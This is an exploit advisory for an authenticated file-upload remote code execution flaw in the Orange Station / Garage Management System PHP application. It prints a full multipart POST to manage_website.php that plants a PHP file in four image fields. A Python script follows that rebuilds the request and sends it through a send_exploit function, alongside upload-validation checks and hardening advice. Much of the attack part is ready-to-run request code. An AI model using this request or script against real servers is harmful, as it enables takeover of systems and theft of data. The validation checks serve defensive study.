## Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 03/26/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
## Reference: https://portswigger.net/web-security/file-upload, https://www.bugcrowd.com/glossary/remote-code-execution-rce/

## Description:
The parameters back_login_image, login_image, invoice_image, and website_image of manage_website.php accept arbitrary file uploads, and the server is then exposed to Remote Code Execution. An attacker who holds valid credentials for this application can upload any PHP file and use it to take over the system or steal sensitive information.

STATUS: HIGH-CRITICAL Vulnerability

## Exploit:

```POST
POST /garage/garage/manage_website.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n
Content-Length: 1871
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/garage/garage/manage_website.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="title"

Orange Station
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="footer"

Admin Panel
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="short_title"

9090909090
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="currency_code"

Shivaji Nagar, Nashik
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="currency_symbol"

₹
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_website_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="website_image"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_invoice_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="invoice_image"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_login_image"

logo.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="login_image"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="old_back_login_image"

service.jpg
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="back_login_image"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
------WebKitFormBoundaryytBZTydZ8OfOJjda
Content-Disposition: form-data; name="btn_web"


------WebKitFormBoundaryytBZTydZ8OfOJjda--
```

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/orange-station-10-multiple-file-upload.html)

## Time spent:
00:27:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/

nu11secur1ty <http://nu11secur1ty.com/>
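The request above, rebuilt as a script, together with the checks the upload handler should have applied to it. This is an added example and is not code from the advisory or from the Garage Management System project. The host, path, session cookie, form field values and the `<?php phpinfo(); ?>` payload are taken from or modelled on the request shown in the advisory; `TEXT_FIELDS` and the sample image bytes are constructed. The advisory does not state where uploaded files are written on the server, so this script does not assume a path to the uploaded file.

```python
"""Added example: rebuild the manage_website.php multipart upload (a PHP
file in each of the four image parameters) and run the server-side checks
a hardened handler would apply to the same body. Not from the advisory or
the vendor's code; host, path, cookie and values mirror the advisory."""
import http.client
import re
from email import policy
from email.parser import BytesParser

BOUNDARY = "----WebKitFormBoundaryytBZTydZ8OfOJjda"
IMAGE_FIELDS = ("website_image", "invoice_image", "login_image", "back_login_image")
# Constructed text fields, mirroring the advisory's request body.
TEXT_FIELDS = {
    "title": "Orange Station",
    "footer": "Admin Panel",
    "short_title": "9090909090",
    "currency_code": "Shivaji Nagar, Nashik",
    "currency_symbol": "INR",
}
PAYLOAD = b"<?php phpinfo(); ?>"

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def _part(name, value, filename=None):
    """One multipart/form-data part, CRLF-terminated as a browser sends it."""
    disp = f'Content-Disposition: form-data; name="{name}"'
    if filename is not None:
        disp += f'; filename="{filename}"\r\nContent-Type: application/octet-stream'
    return f"--{BOUNDARY}\r\n{disp}\r\n\r\n".encode() + value + b"\r\n"


def build_body(text_fields, image_fields, filename, payload):
    """Text fields, then old_<field>/<field> pairs, then btn_web, as in the advisory."""
    parts = [_part(k, v.encode()) for k, v in text_fields.items()]
    for name in image_fields:
        parts.append(_part(f"old_{name}", b"logo.jpg"))
        parts.append(_part(name, payload, filename=filename))
    parts.append(_part("btn_web", b""))
    parts.append(f"--{BOUNDARY}--\r\n".encode())
    return b"".join(parts)


def check_uploads(body):
    """Checks the vulnerable handler lacks: extension allowlist, image magic
    bytes, and no PHP open tag inside an otherwise valid image.
    Returns {field: reason} for every file part that must be rejected."""
    raw = f'Content-Type: multipart/form-data; boundary="{BOUNDARY}"\r\n\r\n'.encode() + body
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    rejected = {}
    for part in msg.iter_parts():
        filename = part.get_filename()
        if filename is None:
            continue  # ordinary text field, not a file
        field = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
        if ext not in ALLOWED_EXT:
            rejected[field] = f"extension '.{ext}' not in allowlist"
        elif not data.startswith(IMAGE_MAGIC):
            rejected[field] = "content is not a JPEG/PNG/GIF"
        elif PHP_TAG.search(data):
            rejected[field] = "image carries an embedded PHP open tag"
    return rejected


def send_exploit(host, cookie, path="/garage/garage/manage_website.php", use_tls=True):
    """POST the advisory's request and return the HTTP status. Needs a logged-in session."""
    body = build_body(TEXT_FIELDS, IMAGE_FIELDS, "info.php", PAYLOAD)
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, timeout=10)
    conn.request("POST", path, body=body, headers={
        "Cookie": cookie,
        "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
        "Content-Length": str(len(body)),
    })
    status = conn.getresponse().status
    conn.close()
    return status


if __name__ == "__main__":
    body = build_body(TEXT_FIELDS, IMAGE_FIELDS, "info.php", PAYLOAD)
    print("a hardened handler would reject:", check_uploads(body))
    # Placeholder host and cookie from the advisory; replace with a real session.
    print("status:", send_exploit("pwnedhost.com", "PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n"))
```

`check_uploads` rejects the advisory's request on the first check alone (`.php` is not an allowed extension); the magic-byte and PHP-tag checks are there because renaming the payload to `shell.php.jpg` or appending it to a real JPEG defeats an extension check on its own. Even with all three checks, the upload directory should not be served with PHP execution enabled and stored names should be generated server-side rather than taken from the `filename` parameter. Where the application writes the uploaded file is not given in the advisory, so locating `info.php` after a successful POST is left to the tester.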